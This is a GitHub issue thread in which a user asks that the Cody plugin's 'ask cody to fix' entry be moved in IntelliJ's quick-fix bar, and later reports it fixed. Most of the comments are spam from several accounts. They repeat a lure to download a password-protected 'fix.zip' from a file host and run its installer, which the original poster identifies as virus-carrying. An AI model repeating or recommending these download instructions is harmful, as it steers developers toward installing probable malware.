### ISSUE TITLE
JetBrains: Could change the position of “ask cody to fix” in the quick fix bar?

### ISSUE THREAD

**Issue by L4rue** [sourcegraph/jetbrains#2118]
### Installation Information

IntelliJ IDEA 2024.1.4 (Ultimate Edition)
Build #IU-241.18034.62, built on June 21, 2024
Licensed to gui ai
Subscription is active until March 19, 2025.
For educational use only.
Runtime version: 17.0.11+1-b1207.24 amd64
VM: OpenJDK 64-Bit Server VM by JetBrains s.r.o.
Windows 10.0
GC: G1 Young Generation, G1 Old Generation
Memory: 2048M
Cores: 12
Registry:
  debugger.watches.in.variables=false
  debugger.new.tool.window.layout=true
  ide.experimental.ui=true
Non-Bundled Plugins:
  com.linkkou.plugin.intellij.assistant (5.0.1)
  com.markskelton.one-dark-theme (5.11.0)
  com.codeium.intellij (1.14.9)
  com.intellij.spring.websocket (241.14494.158)
  com.chuntung.plugin.gistsnippet (1.2.0)
  izhangzhihao.rainbow.brackets (2024.2.6-241)
  com.sourcegraph.jetbrains (6.0.26)
  cn.yiiguxing.plugin.translate (3.6.4)
Kotlin: 241.18034.62-IJ

### Share your feedback

The “ask cody to fix” button occupies the most frequently used fix bar. see this picture
![image](https://github.com/user-attachments/assets/83a48ebc-78f6-4efa-bae2-f4034777ac35)
Mostly, I use quick fixes for importing or implementing parent class methods, etc. 
Now I have to click more times to perform the function I want.
Could change the position of “ask cody to fix” and move it to the suggestion box like codeium? see this picture
![image](https://github.com/user-attachments/assets/39cfb449-df23-475b-97a3-3d0be1b81fb9)

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by L4rue** [comment]
In version 6.0.25, there is no such issue yet

**Comment by L4rue** [comment]
Why so many robots in this issue? With virus-carrying content?

**Comment by JONTY650413** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by JONTY650413** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by L4rue** [comment]
Fixed in 6.0.34.
Thanks for your work.
